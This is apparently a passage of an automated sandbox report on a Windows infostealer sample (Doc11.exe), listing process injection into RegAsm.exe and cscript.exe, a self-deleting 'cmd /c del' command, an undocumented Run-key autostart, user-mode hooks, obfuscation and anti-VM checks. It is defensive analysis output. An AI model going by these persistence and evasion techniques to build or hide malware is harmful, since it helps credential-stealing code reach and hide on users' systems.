 Source: C:\Users\user\Desktop\Doc11.exe Code function: 0_2_009D4A58 Source: C:\Users\user\Desktop\Doc11.exe Code function: 0_2_009D5B80 Source: C:\Users\user\Desktop\Doc11.exe Code function: 0_2_009D4A48 Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00401030 Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0041E98F Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0041DA6C Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0041E539 Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00402D90 Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00409E1B Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00409E20 Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0041DFA4 Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00402FB0 Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031F2B28 Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0315EBB0 Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031E03DA Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031EDBD2 Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031DFA2B Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031F22AE Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0312F900 Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_03144120 Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031E1002 Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031FE824 Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0313B090 Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031520A0 Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031F20A8 Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031F28EC Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031FDFCE Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031F1FF1 Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031ED616 Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_03146E30 Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031F2EF7 Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031F2D07 Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_03120D20 Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031F1D55 Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_03152581 Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031F25DD Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0313D5E0 Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0313841F Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031ED466 Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04BF841F Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04CAD466 Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04CB25DD Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C12581 Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04BFD5E0 Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04BE0D20 Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04CB1D55 Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04CB2D07 Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04CB2EF7 Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04CAD616 Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C06E30 Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04CBDFCE Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04CB1FF1 Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04CB28EC Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04BFB090 Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C120A0 Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04CB20A8 Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04CA1002 Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04CBE824 Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04BEF900 Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C04120 Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04CB22AE Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C9FA2B Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04CA03DA Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04CADBD2 Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C1EBB0 Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04CB2B28 Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_00B02D90 Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_00B09E20 Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_00B09E1B Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_00B02FB0 Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_00B1DFA4
 Found potential string decryption / allocating functions Show sources
 Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 0312B150 appears 45 times Source: C:\Windows\SysWOW64\cscript.exe Code function: String function: 04BEB150 appears 45 times
 Sample file is different than original file name gathered from version info Show sources
 Source: Doc11.exe, 00000000.00000002.196411457.0000000005D60000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamePGzTmRHSQnoDrXlf.bounce.exe4 vs Doc11.exe
 Tries to load missing DLLs Show sources
 Yara signature match Show sources
 PE file has an executable .text section which is very likely to contain packed code (zlib compression ratio < 0.3) Show sources
 Source: Doc11.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
 Classification label Show sources
 Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@9/4@3/4
 Creates files inside the user directory Show sources
 Creates mutexes Show sources
 Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5708:120:WilError_01
 PE file has an executable .text section and no other executable section Show sources
 Source: Doc11.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
 Parts of this applications are using the .NET runtime (Probably coded in C#) Show sources
 Source: C:\Users\user\Desktop\Doc11.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
 Reads the hosts file Show sources
 Sample is known by Antivirus Show sources
 Source: Doc11.exe Virustotal: Detection: 34% Source: Doc11.exe ReversingLabs: Detection: 25%
 Spawns processes Show sources
 Source: unknown Process created: C:\Users\user\Desktop\Doc11.exe 'C:\Users\user\Desktop\Doc11.exe' Source: unknown Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Source: unknown Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Source: unknown Process created: C:\Windows\SysWOW64\cscript.exe C:\Windows\SysWOW64\cscript.exe Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe' Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Source: C:\Users\user\Desktop\Doc11.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Source: C:\Users\user\Desktop\Doc11.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Source: C:\Windows\SysWOW64\cscript.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe'
 Uses an in-process (OLE) Automation server Show sources
 Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{317D06E8-5F24-433D-BDF7-79CE68D8ABC2}\InProcServer32
 Writes ini files Show sources
 Checks if Microsoft Office is installed Show sources
 Source: C:\Windows\SysWOW64\cscript.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
 PE file contains a COM descriptor data directory Show sources
 Source: Doc11.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
 Contains modern PE file flags such as dynamic base (ASLR) or NX Show sources
 Source: Doc11.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
 Binary contains paths to debug symbols Show sources
 Source: Binary string: cscript.pdbUGP source: RegAsm.exe, 00000002.00000002.227587280.0000000003010000.00000040.00000001.sdmp Source: Binary string: wntdll.pdbUGP source: RegAsm.exe, 00000002.00000002.227632586.0000000003100000.00000040.00000001.sdmp, cscript.exe, 00000006.00000002.443093817.0000000004CDF000.00000040.00000001.sdmp Source: Binary string: RegAsm.pdb source: cscript.exe, 00000006.00000002.441341304.0000000000DA7000.00000004.00000020.sdmp Source: Binary string: wntdll.pdb source: RegAsm.exe, cscript.exe Source: Binary string: RegAsm.pdb4 source: cscript.exe, 00000006.00000002.441341304.0000000000DA7000.00000004.00000020.sdmp Source: Binary string: cscript.pdb source: RegAsm.exe, 00000002.00000002.227587280.0000000003010000.00000040.00000001.sdmp
 Uses code obfuscation techniques (call, push, ret) Show sources
 Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00417C5A push esp; iretd Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0041CDF5 push eax; ret Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0041658D push ds; retf Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0041CE42 push eax; ret Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0041CE4B push eax; ret Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_004176EE push cs; retf Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0041CEAC push eax; ret Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0317D0D1 push ecx; ret Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C3D0D1 push ecx; ret Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_00B1DB5C push edi; ret Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_00B1DCA9 push 0D8910A8h; iretd Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_00B17C5A push esp; iretd Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_00B1CDF5 push eax; ret Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_00B1CEAC push eax; ret Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_00B176EE push cs; retf Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_00B1CE42 push eax; ret Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_00B1CE4B push eax; ret
 Binary may include packed or encrypted code Show sources
 Source: initial sample Static PE information: section name: .text entropy: 7.85074481612

### Boot Survival:

 Creates an undocumented autostart registry key Show sources
 Source: C:\Windows\SysWOW64\cscript.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run 3FL0ZNGX9 Jump to behavior

### Hooking and other Techniques for Hiding and Protection:

 Modifies the prolog of user mode functions (user mode inline hooks) Show sources
 Source: explorer.exe User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x87 0x7E 0xED
 Disables application error messsages (SetErrorMode) Show sources
 Source: C:\Users\user\Desktop\Doc11.exe Process information set: NOOPENFILEERRORBOX Source: C:\Users\user\Desktop\Doc11.exe Process information set: NOOPENFILEERRORBOX Source: C:\Users\user\Desktop\Doc11.exe Process information set: NOOPENFILEERRORBOX Source: C:\Users\user\Desktop\Doc11.exe Process information set: NOOPENFILEERRORBOX Source: C:\Users\user\Desktop\Doc11.exe Process information set: NOOPENFILEERRORBOX Source: C:\Users\user\Desktop\Doc11.exe Process information set: NOOPENFILEERRORBOX Source: C:\Users\user\Desktop\Doc11.exe Process information set: NOOPENFILEERRORBOX Source: C:\Users\user\Desktop\Doc11.exe Process information set: NOOPENFILEERRORBOX Source: C:\Users\user\Desktop\Doc11.exe Process information set: NOOPENFILEERRORBOX Source: C:\Users\user\Desktop\Doc11.exe Process information set: NOOPENFILEERRORBOX Source: C:\Users\user\Desktop\Doc11.exe Process information set: NOOPENFILEERRORBOX Source: C:\Users\user\Desktop\Doc11.exe Process information set: NOOPENFILEERRORBOX Source: C:\Users\user\Desktop\Doc11.exe Process information set: NOOPENFILEERRORBOX Source: C:\Users\user\Desktop\Doc11.exe Process information set: NOOPENFILEERRORBOX Source: C:\Users\user\Desktop\Doc11.exe Process information set: NOOPENFILEERRORBOX Source: C:\Users\user\Desktop\Doc11.exe Process information set: NOOPENFILEERRORBOX Source: C:\Users\user\Desktop\Doc11.exe Process information set: NOOPENFILEERRORBOX Source: C:\Users\user\Desktop\Doc11.exe Process information set: NOOPENFILEERRORBOX Source: C:\Windows\SysWOW64\cscript.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Source: C:\Windows\SysWOW64\cscript.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Source: C:\Windows\SysWOW64\cscript.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Source: C:\Windows\SysWOW64\cscript.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Source: C:\Windows\SysWOW64\cscript.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

### Malware Analysis System Evasion:

 Tries to detect virtualization through RDTSC time measurements Show sources